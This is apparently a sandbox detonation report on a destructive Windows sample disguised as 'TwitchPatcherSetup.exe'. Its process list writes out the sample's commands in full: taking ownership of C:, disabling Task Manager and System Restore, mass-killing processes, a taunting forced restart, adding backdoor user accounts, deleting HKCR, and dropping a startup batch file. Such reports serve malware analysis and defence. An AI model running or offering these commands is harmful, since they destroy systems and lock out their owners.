| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\BCSAddin.ManageSolutionHelper.1 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBC} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CD000011-8B95-11D1-82DB-00C04FB1625D}\InprocServer32 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.jtx\shellex | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{86d5eb8a-859f-4c7b-a76b-2bd819b7a850} | C:\Windows\system32\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Windows\System32\WScript.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe
"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"
C:\Windows\system32\takeown.exe
takeown /f C:\*.*
C:\Windows\system32\icacls.exe
Icacls C:\*.* /C /G Admin:F
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9388.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9057.vbs"
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\rundll32.exe
rundll32 user32.dll, SwapMouseButton
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\22951.vbs"
C:\Windows\system32\timeout.exe
timeout 14
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
C:\Windows\system32\taskkill.exe
taskkill /F /IM hl2.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM javaw.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM RobloxPlayerBeta.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Among Us.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\system32\shutdown.exe
shutdown -r -t 300 -c "Dans 5 minutes tu n'as plus de PC fils de viol, la OGK t'a bien baiser le cul :)"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13200.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16799.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1123.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29779.vbs" 11577.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\11577.bat" "
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\system32\net.exe
net user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 18-25 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18-25 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user T'A bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user T'A bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user BIEN bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user BIEN bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user D?TRUIT bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user D?TRUIT bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user CUL bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user CUL bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user ENFANT bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user ENFANT bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user DE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user DE bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user SATAN bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user SATAN bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 265822375520895 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 265822375520895 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 19125836817209 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 19125836817209 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 30108148877259 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 30108148877259 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 239251573925627 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 239251573925627 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 18963165974 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18963165974 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 1632344953653 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 1632344953653 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 4678262487395 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 4678262487395 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 937014730975 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 937014730975 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 311411974722731 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 311411974722731 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 20505218385761 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 20505218385761 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 271022012222756 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 271022012222756 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 20921730826316 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 20921730826316 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 265822599218799 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 265822599218799 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 103561796027639 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 103561796027639 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 123482739727087 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 123482739727087 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 200142976626644 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 200142976626644 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 315832113316963 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 315832113316963 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 230521891520729 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 230521891520729 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
C:\Windows\system32\reg.exe
reg delete HKCR /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.80:80 | crl.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat
| MD5 | e5097bb73edc13e33242930a46f4e976 |
| SHA1 | 1e644b0f44a4e1ea3612a3adea61d2a984f06605 |
| SHA256 | 97041695f1a22009f88d14a0ab45b61f6ef0c7fd962af2e7495de690df27cbe1 |
| SHA512 | 7581babda9be534dee091cb9d3bbef984ce0d7c11accdf1fcf409d446c156ba56759c24a822b83e9d9c5413702a99733838f6ed16b3d2e3bfe6ad03c5fe44a9e |
C:\Users\Admin\AppData\Local\Temp\9388.vbs
| MD5 | ed4068f59e84632317fe338a2892ecb1 |
| SHA1 | 260ca0f384ec0784933794a7aed6fb0ac8aaec23 |
| SHA256 | 24baf9de71f49028cf6188127dea430347bee63f553225dc93c97db83a4ffeaf |
| SHA512 | 93774b5f8e54c16cf65db696613201b88bf64847e8558b8171ec7351e9cdc133a28df6a9f3269add80b8a588761bf9b2c40015cdd5b3e068cee9d069b66be1c5 |
C:\Users\Admin\AppData\Local\Temp\9057.vbs
| MD5 | 17b8608905bad5079f8ef5d1c8b9aafb |
| SHA1 | 65864828c6bc101e9234453e0be83b46868f96e7 |
| SHA256 | 4d909b6c65777ad719bf85bd5e9de00739b962f2c0bab4a49c0c31fa268e93fc |
| SHA512 | 5f2fee37de012f090267c3ad1f4fa2ff5051aa4bf6c5a2a476a4b4e9b1272b16301d3c82d38f33732b767447de8da2ce967a26c1952048c1e8315c7d8e1bfbc1 |
C:\Users\Admin\AppData\Local\Temp\22951.vbs
| MD5 | 4148025b2c24c93fd1e7d85860e6b816 |
| SHA1 | 0b5b79f0c4d44b0ebdb990ee6b662f835a07dd98 |
| SHA256 | 3cb01880c6a02c5f8aad54ee9d5e6a3500777e20c4c07ea56fa267e16f3ad7e0 |
| SHA512 | bdf85f2a0581895a28b93dc7038b2d269bdc4a290b778fe3467834b5d8d203f340f41563cfc9c77e22f63a7646c5ce83861c94f687d2dbda06055163a6f8a943 |
C:\Users\Admin\AppData\Local\Temp\1123.vbs
| MD5 | 523092d53a06f5b46778a0cd7c01d0fb |
| SHA1 | 221a8244271afdbe7ce105aaf189f1dbcfa57cdb |
| SHA256 | 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e |
| SHA512 | 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb |
C:\Users\Admin\AppData\Local\Temp\13200.vbs
| MD5 | 27bf402bae00ba56abb7fce0eac5fe88 |
| SHA1 | 7b17239cc71d9a3bd2a42307cc7059a2b2616ce7 |
| SHA256 | f54c91b6da58a43d45cd300670055e9569f7006a6428fd5e875b0c59feb0771d |
| SHA512 | 6cc36a79ed28cf292c4e6220ee026f3dc47779684600801d60424ca64a53cbff453e983f97559dc93927cccac94a23bf2c0f49cb826b047db9b409fe599c37ef |
C:\Users\Admin\AppData\Local\Temp\16799.vbs
| MD5 | 8a9b451fd9936100f33b576bb5ec3f02 |
| SHA1 | 80c92544f733ddfb96dffa296293fb2835e85f2e |
| SHA256 | 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455 |
| SHA512 | b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f |
C:\Users\Admin\AppData\Local\Temp\21530.vbs
| MD5 | 03b33eb1d025801e1882fc0ba1135c71 |
| SHA1 | 9a92fcaddcc864bf25eecf1c4165ff0da22016a2 |
| SHA256 | 338d26cb8fe98ff9377e335a1480cdc37977f346b132ab149cdd33220e0728d7 |
| SHA512 | 92260a7eb7f760a511900bf5b53f47109783c1b6ca49aa930c171b15b85ac608c2c7243b1fad73baf33b9368e988780f5185f117ff0061b62cd67f138798cfcd |
C:\Users\Admin\AppData\Local\Temp\29779.vbs
| MD5 | ec385d968eea8bf5abe4587305f39c89 |
| SHA1 | 6509b0bb7cb6432a4c723f37dc7593116ad57c64 |
| SHA256 | 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96 |
| SHA512 | d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8 |
C:\Users\Admin\AppData\Local\Temp\11577.bat
| MD5 | c87a392101c9ef2d198ae207e7be82d8 |
| SHA1 | c2a3248515376ce6e2f2c3b9d0cc7c8bb6bb55d3 |
| SHA256 | 8663b0814f18599336aa812324595fe88448c2ceba2994953e0d0b3ae2695bb5 |
| SHA512 | 416a02c66c9ed020b607db4fb44cd9c09b437f112c235545473fccea5342cbc105cb120d0af859022cc737444fd63a3de637f260468931494a5dd9d1e3d662dd |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\CabF069.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarF08B.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win10v2004-20240802-en
Max time kernel
99s
Max time network
130s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
